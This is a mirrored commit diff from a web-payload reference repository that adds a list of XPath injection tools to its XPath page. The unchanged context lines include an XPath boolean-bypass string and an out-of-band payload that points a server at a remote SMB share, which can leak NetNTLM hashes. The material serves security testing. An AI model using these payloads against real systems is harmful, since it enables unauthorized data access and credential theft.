mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
XPATH: add tools
This commit is contained in:
parent
882eec0566
commit
525429c0d8
@ -7,6 +7,7 @@
|
|||||||
* [Exploitation](#exploitation)
|
* [Exploitation](#exploitation)
|
||||||
* [Blind exploitation](#blind-exploitation)
|
* [Blind exploitation](#blind-exploitation)
|
||||||
* [Out Of Band Exploitation](#out-of-band-exploitation)
|
* [Out Of Band Exploitation](#out-of-band-exploitation)
|
||||||
|
* [Tools](#tools)
|
||||||
* [References](#references)
|
* [References](#references)
|
||||||
|
|
||||||
## Exploitation
|
## Exploitation
|
||||||
@ -47,8 +48,15 @@ x' or name()='username' or 'x'='y
|
|||||||
http://example.com/?title=Foundation&type=*&rent_days=* and doc('//10.10.10.10/SHARE')
|
http://example.com/?title=Foundation&type=*&rent_days=* and doc('//10.10.10.10/SHARE')
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## Tools
|
||||||
|
|
||||||
|
- [xcat](https://github.com/orf/xcat) - Automate XPath injection attacks to retrieve documents
|
||||||
|
- [xxxpwn](https://github.com/feakk/xxxpwn) - Advanced XPath Injection Tool
|
||||||
|
- [xxxpwn_smart](https://github.com/aayla-secura/xxxpwn_smart) - A fork of xxxpwn using predictive text
|
||||||
|
- [xpath-blind-explorer](https://github.com/micsoftvn/xpath-blind-explorer)
|
||||||
|
- [XmlChor](https://github.com/Harshal35/XMLCHOR) - Xpath injection exploitation tool
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
* [OWASP XPATH Injection](https://www.owasp.org/index.php/Testing_for_XPath_Injection_(OTG-INPVAL-010))
|
* [OWASP XPATH Injection](https://www.owasp.org/index.php/Testing_for_XPath_Injection_(OTG-INPVAL-010))
|
||||||
* [XPATH Blind Explorer](http://code.google.com/p/xpath-blind-explorer/)
|
|
||||||
* [Places of Interest in Stealing NetNTLM Hashes - Osanda Malith Jayathissa - March 24, 2017](https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/)
|
* [Places of Interest in Stealing NetNTLM Hashes - Osanda Malith Jayathissa - March 24, 2017](https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/)
|
||||||
|
Loading…
Reference in New Issue
Block a user